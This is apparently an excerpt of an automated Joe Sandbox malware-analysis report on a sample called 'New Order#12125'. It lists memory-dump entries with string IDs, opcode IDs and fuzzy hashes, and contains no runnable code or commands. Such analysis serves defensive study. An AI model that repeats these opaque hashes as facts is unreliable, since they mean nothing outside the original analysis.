                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalTags
                                                                        • API String ID: 0-1106856819
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .mui
                                                                        • API String ID: 0-1199573805
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EXT-
                                                                        • API String ID: 0-1948896318
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: :fcx
                                                                        • API String ID: 0-3800477985
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #
                                                                        • API String ID: 0-1885708031
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        Strings
                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0158895E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                        • API String ID: 0-702105204
                                                                        • Opcode ID: 6a25ba4527d4fefe88c59d6bd02de9d70d9df672c58324c4c5aaafc111ff557c
                                                                        • Instruction ID: 148f00c44c113149270df4415683d46ff76b836538aacff5bcbcaf172a642f80
                                                                        • Opcode Fuzzy Hash: 6a25ba4527d4fefe88c59d6bd02de9d70d9df672c58324c4c5aaafc111ff557c
                                                                        • Instruction Fuzzy Hash: 6A0126363102029BE6317B5ACC84F6A7FA5FFC1254B84052DF7417E162CB20A844C792
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a44c5be99113510459c2c31d76024390bc1ca428a07f4c51623b6b00110df349
                                                                        • Instruction ID: b408fc2469009f436e5818fb4824112e089c863babb613ce8044d9f74a655add
                                                                        • Opcode Fuzzy Hash: a44c5be99113510459c2c31d76024390bc1ca428a07f4c51623b6b00110df349
                                                                        • Instruction Fuzzy Hash: 00823372F102188BCF58CFADD8916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c7a76cac1120e2f7e4df42150ca5c8d0491213807f6a7fd1e78ef562f368164e
                                                                        • Instruction ID: 3ae7b08be9c0c94b25a66a14ddd57f93ebc8838dcb59882ad6ed90557155442e
                                                                        • Opcode Fuzzy Hash: c7a76cac1120e2f7e4df42150ca5c8d0491213807f6a7fd1e78ef562f368164e
                                                                        • Instruction Fuzzy Hash: 9D62B33691864AAFCF25CF08D4904AEFB62BE5531CB49C55DC89B2F605E371BA48CBD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1cf393907bc91d117bf34016575d32faad59c663c504ca9e5707a485d188598
                                                                        • Instruction ID: f7b25c7801cafd3af231b568fc7a6cfbc0e2c3ea9f1414375f87491fc7ae285e
                                                                        • Opcode Fuzzy Hash: c1cf393907bc91d117bf34016575d32faad59c663c504ca9e5707a485d188598
                                                                        • Instruction Fuzzy Hash: 7542B5356483429FD725CF68C891A6FBBE5BFC8300F88492DFA869B250D770D945CB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a6e9181c885281dd08fa1062c62e8297ba81832ccf00fc445dee9b152a823cc
                                                                        • Instruction ID: b069f51c6057e821510f6e0a18e54319a3b14d5d0aaf69bf4f964b40983444fd
                                                                        • Opcode Fuzzy Hash: 2a6e9181c885281dd08fa1062c62e8297ba81832ccf00fc445dee9b152a823cc
                                                                        • Instruction Fuzzy Hash: 6642BF71A006168FDB59CF59C4A0AAEBBF2FF8C314B54855ED952AF340D730E942CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d150693ef1e4c635eb1f24eb1ee4c206ab2b8ec83845be019e0029940e3d6f30
                                                                        • Instruction ID: 046468905c6c33368e736075b0462efb749951b78f4edcf561a3e518c898f852
                                                                        • Opcode Fuzzy Hash: d150693ef1e4c635eb1f24eb1ee4c206ab2b8ec83845be019e0029940e3d6f30
                                                                        • Instruction Fuzzy Hash: 3032B676E0122ADBDF24DF98C890BAEBBB5FF55714F180029E905AF391E7359901CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4379a8e4195f6ff758f7e06eba4c2b87d2de6e8e384a22c489cf289eac55a8bb
                                                                        • Instruction ID: 0ae25307df3be4edf79cd3f61743448a0aed3ede6f5b12825f4c38bb95acfa6c
                                                                        • Opcode Fuzzy Hash: 4379a8e4195f6ff758f7e06eba4c2b87d2de6e8e384a22c489cf289eac55a8bb
                                                                        • Instruction Fuzzy Hash: A6426C75A102198FEF24CF69C881BADBBF5BF89300F148099E949EF242D7349985CF61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4198b693acb82ab4b2331f0cbca23ef437f42286ffb38d9964dd017ce237468d
                                                                        • Instruction ID: ff39ca782b6c576554dc0d9459e8bdcd92cae19b379ea7e3ddadd5022cd1e30d
                                                                        • Opcode Fuzzy Hash: 4198b693acb82ab4b2331f0cbca23ef437f42286ffb38d9964dd017ce237468d
                                                                        • Instruction Fuzzy Hash: 72B17470A0026A8BDB64DF59C890BADB7B1FF44704F0485EED64ADB351EB709D86CB24
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 157ef845c9a36e38f9bf58662a0beda5337a7fe00cf1e010b0998213a0ed1321
                                                                        • Instruction ID: a8a5c0254cc95cbca1c248967be45246696d2f85af1c13be57add6f3f71e08f9
                                                                        • Opcode Fuzzy Hash: 157ef845c9a36e38f9bf58662a0beda5337a7fe00cf1e010b0998213a0ed1321
                                                                        • Instruction Fuzzy Hash: 70A14732E006669FEB31DB58E855BAEBBB8FB42714F050116EA10AF2D0D774AD40CBD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ff7846ce8ac95a1569c3fd794087d2d63dc55ef358a01a99515e67539c190c2
                                                                        • Instruction ID: 40407a68e16a3d57bd33403c818c65232a815d2f2d8f7d5ccfe4eaeb17f0cc86
                                                                        • Opcode Fuzzy Hash: 6ff7846ce8ac95a1569c3fd794087d2d63dc55ef358a01a99515e67539c190c2
                                                                        • Instruction Fuzzy Hash: ECA1BF70B006169BDB25DF69D991BAEB7B1FF44318F204529EB059F2C1DB34E811DBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1bf38e88e99af27ac670c25d8be9aa46d98a6ec52564cbd6f9b58697d128eadc
                                                                        • Instruction ID: 820477ce33f7416bc3f4aa0512586e6c91e6305e6c9bf7806094ac6300004eb7
                                                                        • Opcode Fuzzy Hash: 1bf38e88e99af27ac670c25d8be9aa46d98a6ec52564cbd6f9b58697d128eadc
                                                                        • Instruction Fuzzy Hash: FBA1CC72A10652EFD722DF18C980B6ABBE9FF88744F45092CE589DFA51D334E801CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction ID: 2a17511e97204639fb092566795ea0d2fbe16710fae92bbcbbdd0bd70389a74c
                                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction Fuzzy Hash: D0B11771E0061ADFDF29DFADC880AADBBB5FF88310F148169E915AB354D730A945CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3cebd8a924cbf5beac7ba7bf4e4d4ce36ba619a75e229d452632e1715176d46b
                                                                        • Instruction ID: 0a4fd0f979523092ba79f62ef5b711bd72176d17f6a3b3b3d444183264040edc
                                                                        • Opcode Fuzzy Hash: 3cebd8a924cbf5beac7ba7bf4e4d4ce36ba619a75e229d452632e1715176d46b
                                                                        • Instruction Fuzzy Hash: 16919F71E00216AFDB15EFA8D884BAEBFB5BB49710F154169E611BF341DB34E9008BA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40765a1a3eb584a53e0c2a48eb61d8c5019a368776e56ac065ca145a1d48b5fd
                                                                        • Instruction ID: d21e537b794dbd3402381626c514cf4aae5adad5fc4260781e792e4f047dd29e
                                                                        • Opcode Fuzzy Hash: 40765a1a3eb584a53e0c2a48eb61d8c5019a368776e56ac065ca145a1d48b5fd
                                                                        • Instruction Fuzzy Hash: 17910031A006168FFB279B68C481B7EBBE5FB94714F068469ED059F288E774D901C7A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                        • Instruction ID: a3e2f3a7794bb1aa0adb69bd6f57e44d68e56a91370973c239f291d803385e38
                                                                        • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                        • Instruction Fuzzy Hash: 22812C32A042968FDB224EACD8C226DFFA5FF92210F184A7AD5429F341C674DD46D791
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                        • Instruction ID: fbae839b267c02e02c882bbd1febc46eee508ab242da890ca2c3c9ae03d800fa
                                                                        • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                        • Instruction Fuzzy Hash: 49913172610A068FE735CF6DC889666BBF0FF65328B148A19D5E6DF6A0C375E521CB00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6df7084bce695f1e3806c138dac636eab194221f43b758a2e438aa47f39e3fba
                                                                        • Instruction ID: 801b3253539f8ec006d741fe3ca48e6a8165506e69cce8ee50ab90a810ed84d6
                                                                        • Opcode Fuzzy Hash: 6df7084bce695f1e3806c138dac636eab194221f43b758a2e438aa47f39e3fba
                                                                        • Instruction Fuzzy Hash: E391C031A00216AFEB15CFA8C8807AFBBE2BF84710F15856EE955DF281D774E901CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54ed2a2c00c972236ac3d38ca7e06b34b253d74334928580ce8acd10ffbdc341
                                                                        • Instruction ID: b588552bc1dee53043244b48f5666f8e855ebc3947fa2eab26a95b04e0a31586
                                                                        • Opcode Fuzzy Hash: 54ed2a2c00c972236ac3d38ca7e06b34b253d74334928580ce8acd10ffbdc341
                                                                        • Instruction Fuzzy Hash: 0291BE72A001159FDB18CF69C8906BEBBF2FF88310B1A866ED815DF295D634D945CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4692f1d4be8033a6883aaf9c0b46c4b6b8157e1ab353aad5e3b6152d9c8252df
                                                                        • Instruction ID: e25a3b5bca253473ff23a0c27d7a9debe2f8004299fda82a464fb6ea0217d0fd
                                                                        • Opcode Fuzzy Hash: 4692f1d4be8033a6883aaf9c0b46c4b6b8157e1ab353aad5e3b6152d9c8252df
                                                                        • Instruction Fuzzy Hash: 3E81B471E005169FCB14CFADC8845AEB7F2FF88A14B15462ED921EB290D774E951CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 780f6761b5bd4aa189ccfddca674b994bdc009ba7e7ec054f767f14cfa05d35d
                                                                        • Instruction ID: 91a36007e13e5232bf1362248849514ef7cf7b904a2b22dbd3ec4f6596f13346
                                                                        • Opcode Fuzzy Hash: 780f6761b5bd4aa189ccfddca674b994bdc009ba7e7ec054f767f14cfa05d35d
                                                                        • Instruction Fuzzy Hash: 1881B535A005199FEB16CF6DC8809AEBBF2FFC5250B248295F9549F389D730E981CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df3a2e48e7e44778b52446d90f726487821ab52b12e8f52035dd8aa508f26f92
                                                                        • Instruction ID: 1f4df94eb8e9a7970be1e3779817408248073ad1e2653a9915af0ce6f653a730
                                                                        • Opcode Fuzzy Hash: df3a2e48e7e44778b52446d90f726487821ab52b12e8f52035dd8aa508f26f92
                                                                        • Instruction Fuzzy Hash: D081B471E006569FDB58CF69C850ABEBBF9FB48710F44852EE845DB640E734D940CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 163206642c2a27d2078a59ad6a48ddcc2f7724722646e4e3de1a6120b8e85bbe
                                                                        • Instruction ID: fa5db11d953e099005c567800a0d7ec243b9b77e37bf6ccde125f9e4071be643
                                                                        • Opcode Fuzzy Hash: 163206642c2a27d2078a59ad6a48ddcc2f7724722646e4e3de1a6120b8e85bbe
                                                                        • Instruction Fuzzy Hash: CA817D76A002159BDB28CFA8C591AEDFBF1FF89310B19816AD816EF385D634DD41CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction ID: dccf4d6da52c9d5c16543cfee48b5a96c690412c6526886cb737d129442f0835
                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction Fuzzy Hash: C2816035A0020A9FDF19CF98C890AAEBBF6BF84714F14856DD9169F345EB74E901CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb9840759e62c97a10282d280ce946b18d6f410667bfc23c00e1b7e68d783e93
                                                                        • Instruction ID: 45c81765de8e5479a074de7543ad5742262d55e7cfaecaf3e9d5cff6c6c9c453
                                                                        • Opcode Fuzzy Hash: fb9840759e62c97a10282d280ce946b18d6f410667bfc23c00e1b7e68d783e93
                                                                        • Instruction Fuzzy Hash: 4981637190060AEFDB26CFA9D881BEEBBF9FF88354F144429E555AB250D730AC45CB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b0f4728ddc4c48331c5fac30079f71a5bab12e3c59308ce5ba077de61a6eb451
                                                                        • Instruction ID: d8296c61d8840c0bbeff5519b98f5d000254b248866556023ba99b007839f300
                                                                        • Opcode Fuzzy Hash: b0f4728ddc4c48331c5fac30079f71a5bab12e3c59308ce5ba077de61a6eb451
                                                                        • Instruction Fuzzy Hash: 4A7125363002618EE724CF2AC98173A77E2FB86705F54895DE996CF2C5C775E802CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c4143f6a405a2abd6925126b1b7963f9e6ab8b4416161e5ededba9b5648dac91
                                                                        • Instruction ID: b8aba04c09566042b21454bd66c5a253530f6a60052bd03ba9372b2f636ea58d
                                                                        • Opcode Fuzzy Hash: c4143f6a405a2abd6925126b1b7963f9e6ab8b4416161e5ededba9b5648dac91
                                                                        • Instruction Fuzzy Hash: A071B9B58006299FDB268F58D9907BEBBF4FF68710F14451AE952AF354D371A804CBE0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 323d9c7c3bce31558599cbd4201c3f100c859e065dae29796c11e6605c718808
                                                                        • Instruction ID: 2311904ec8f41bf0855d3ecade71c65d573e4751ac90b25f2eaea9eae4d90195
                                                                        • Opcode Fuzzy Hash: 323d9c7c3bce31558599cbd4201c3f100c859e065dae29796c11e6605c718808
                                                                        • Instruction Fuzzy Hash: C8717E70900245EFDB30DFA9DA80A9EBBF9FB90300F11815EE621EF29AD7719944DB54
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e16284695606fe78643e728621f3bed3db0dcc270c9221151c0098da7262c1a
                                                                        • Instruction ID: 317d6062f9495844531444d4eaa517d241d69e1765d444d2caaac13b5ceb6794
                                                                        • Opcode Fuzzy Hash: 0e16284695606fe78643e728621f3bed3db0dcc270c9221151c0098da7262c1a
                                                                        • Instruction Fuzzy Hash: 2F41E2726003029FD725DF68C881A6BB7F9FF99224F11482EE557DF255DB30E8448B90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                        • Instruction ID: 8556cfd47a333a09ecc5421df21fa4537f5f52ec1d093d6b7dc75517d3bdc106
                                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                        • Instruction Fuzzy Hash: BD517A75A00219DFDB15CF98C481AAEF7F2FF84710F2881A9D915AB355D730AE82CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fadfcbfcdb41ad99105ac00009ae8d6c60f2d8a0cbd76d970eea74f1ea1fb408
                                                                        • Instruction ID: 42ec459ca7092699fe1d584012e16efd09f3eb1b84be24c5bc2570050acd002f
                                                                        • Opcode Fuzzy Hash: fadfcbfcdb41ad99105ac00009ae8d6c60f2d8a0cbd76d970eea74f1ea1fb408
                                                                        • Instruction Fuzzy Hash: 5851C4709002179FEB269B68CC40BACBBF5FF51314F1482A9E5299F2D5D734A991CF80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 817a0fdbbff11aa7b93619798243ba7b3a08196d2ed1c6d1f6a3fa5ca605fc83
                                                                        • Instruction ID: 031208164edcdd0fed19c422cd46808e85ccdd3953101b61a138ee5f4a422434
                                                                        • Opcode Fuzzy Hash: 817a0fdbbff11aa7b93619798243ba7b3a08196d2ed1c6d1f6a3fa5ca605fc83
                                                                        • Instruction Fuzzy Hash: 7541A571A402299FDB62DF68C941BEEB7B4FF45750F0500AAE908AF281D774DE81CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
